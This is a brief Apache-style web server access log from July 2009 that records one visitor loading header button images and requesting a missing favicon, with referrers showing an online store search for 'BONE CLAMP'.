90.207.42.53 - - [12/Jul/2009:05:19:40 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:40 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:40 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:40 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
